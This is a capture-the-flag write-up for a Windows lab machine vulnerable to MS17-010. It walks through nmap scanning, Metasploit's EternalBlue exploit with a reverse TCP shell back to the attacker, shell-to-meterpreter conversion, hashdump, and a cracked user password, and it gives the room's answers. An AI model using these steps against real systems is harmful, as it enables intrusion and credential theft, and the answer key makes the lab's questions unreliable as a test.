Write-up

Step-by-step guide on the approach taken to pwn the machine.

Task 1: RECON

How many ports are opejn with a port number under 1000?

We start by running an nmap scan on ports 1-999:

sudo nmap -sCV -Pn -T5 -p1-9999 <ip_victim>

Answer: 3

What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

We continue by running another nmap:

sudo nmap -sCV --script vuln <ip_victim>

Answer: ms17-010

---

Task 2: GAIN ACCESS

Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/.......)

We open metasploit

msfconsole -q
search ms17-010

Answer: exploit/windows/smb/ms17_010_eternalblue

Show options and set the one required value. What is the name of this value? (All caps for submission)

To get the answer we need to select the previous exploit and watch the options

use exploit/windows/smb/ms17_010_eternalblue
show options

Answer: RHOSTS

Usually it would be fine to run this exploit as is; however, for the sake of learning, you should do one more thing before exploiting the target. Enter the following command and press enter:

set payload windows/x64/shell/reverse_tcp

To perform this we need to do the following on our msfconsole:

set RHOSTS <ip_victim>
set payload windows/x64/shell/reverse_tcp
set LHOST <our_ip>
run

---

Task 3: ESCALATE

If you haven't already, background the previously gained shell (CTRL+Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (exact path, similar to the exploit we previously selected)

In order to convert a shell to meterpreter shell in metasploit we should do:

Ctrl + Z
y
sessions
search shell_to_meterpreter
use 0

Answer: post/multi/manage/shell_to_meterpreter

Select this (use MODULE_PATH). Show options, what option are we required to change?

We should do:

show options
set SESSION <session_id>
run

After a while we can see another session created.

Answer: SESSION

Once the meterpreter shell conversion completes, select that session for use.

sessions 2

List all of the processes running via the 'ps' command. Just because we are system doesn't mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column)

For this step and the next one, we should execute:

ps
// Write cmd.exe PID
migrate <PID>

---

Task 4: CRACKING

Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?

Now we are going to use hashdump:

Answer: Jon

Copy this password hash to a file and research how to crack it. What is the cracked password?

For this we should use crackstation

Answer: alwfna22

---

Task 5: FIND FLAGS!

Flag1? This flag can be found at the system root.

System root is in / so:

cd /
ls
cat flag1.txt

*Errata: Windows really doesn't like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This relatively rare, however, it can happen.

So, we need to execute:

cd Windows\\System32\\config\\
ls
cat flag2.txt

Flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.

After a while searching, we's founded the flag3 in C:\Users\Jon\Documents so:

cd C:\Users\Jon\Documents
ls
cat flag3.txt

---